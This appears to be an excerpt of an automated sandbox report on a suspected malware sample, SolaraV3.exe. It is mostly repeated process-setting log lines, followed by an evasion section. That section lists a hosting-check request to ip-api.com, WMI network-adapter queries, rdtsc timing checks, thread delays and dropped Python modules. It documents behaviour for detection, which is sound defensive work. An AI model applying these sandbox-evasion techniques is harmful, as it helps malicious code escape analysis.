              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B815731 rdtsc 2_2_00007FFB0B815731
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8015Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7779
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1625
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6689
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2824
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5447
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1321
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4059
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5225
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 877
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4076
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dllJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\SolaraV3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pydJump to dropped file
